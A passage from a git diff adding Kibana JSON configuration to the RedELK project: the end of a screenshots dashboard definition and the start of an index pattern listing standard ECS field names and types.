}, + "coreMigrationVersion": "7.16.3", + "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization" + }, + { + "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", + "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", + "type": "visualization" + }, + { + "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", + "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", + "type": "visualization" + }, + { + "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", + "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", + "type": "visualization" + }, + { + "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", + "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 91 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "RedELK screenshots dashboard", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "d4eb5dce-3894-4599-8c17-042fc067d58c", + "w": 24, + "x": 0, + "y": 2 + }, + "panelIndex": "d4eb5dce-3894-4599-8c17-042fc067d58c", + "panelRefName": "panel_d4eb5dce-3894-4599-8c17-042fc067d58c", + "title": "Screenshots over time", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 19, + "i": "1db7741d-210a-4331-b1cb-affc6ac1334e", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "1db7741d-210a-4331-b1cb-affc6ac1334e", + "panelRefName": "panel_1db7741d-210a-4331-b1cb-affc6ac1334e", + "type": "search", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", + "w": 7, + "x": 24, + "y": 2 + }, + "panelIndex": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", + "panelRefName": "panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", + "title": "Total screenshots", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "66403011-8fb6-402f-b9b6-5f503d6df704", + "w": 17, + "x": 31, + "y": 2 + }, + "panelIndex": "66403011-8fb6-402f-b9b6-5f503d6df704", + "panelRefName": "panel_66403011-8fb6-402f-b9b6-5f503d6df704", + "title": "Screenshots target users", + "type": "visualization", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "RedELK - Screenshots dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization" + }, + { + "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", + "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", + "type": "visualization" + }, + { + "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", + "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", + "type": "search" + }, + { + "id": "389dddc0-d317-11ea-9301-a30a04251ae9", + "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", + "type": "visualization" + }, + { + "id": "659280b0-d317-11ea-9301-a30a04251ae9", + "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", + "type": "visualization" + } + ], + "sort": [ + 1642171876916, + 97 + ], + "type": "dashboard", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json new file mode 100644 index 00000000..dc33d315 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json @@ -0,0 +1,8685 @@ +[ + { + "attributes": { + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.ephemeral_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "as.number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "as.organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "as.organization.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "as.organization.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.address", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "client.as.number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.as.organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "client.as.organization.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "client.as.organization.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "client.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "client.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "client.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "client.nat.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "client.nat.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "client.packets", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "client.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.registered_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.top_level_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.full_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "client.user.full_name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "client.user.full_name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "client.user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "client.user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "client.user.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.account.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.availability_zone", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.instance.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.instance.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.machine.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.provider", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "cloud.region", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "code_signature.exists", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "code_signature.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "code_signature.subject_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "code_signature.trusted", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "code_signature.valid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "container.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "container.image.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "container.image.tag", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "container.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "container.runtime", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.address", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "destination.as.number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.as.organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "destination.as.organization.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "destination.as.organization.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "destination.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "destination.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "destination.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "destination.nat.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "destination.nat.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "destination.packets", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "destination.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.registered_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.top_level_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.full_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "destination.user.full_name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "destination.user.full_name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "destination.user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "destination.user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "destination.user.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "dll.code_signature.exists", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.code_signature.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.code_signature.subject_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "dll.code_signature.trusted", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "dll.code_signature.valid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.hash.sha512", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.pe.company", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.pe.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.pe.file_version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.pe.original_file_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dll.pe.product", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.answers.class", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.answers.data", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.answers.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "dns.answers.ttl", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.answers.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.header_flags", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.op_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.question.class", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.question.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.question.registered_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.question.subdomain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.question.top_level_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.question.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "dns.resolved_ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.response_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dns.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "ecs.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "error.message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.stack_trace", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "error.stack_trace.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "error.stack_trace" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": 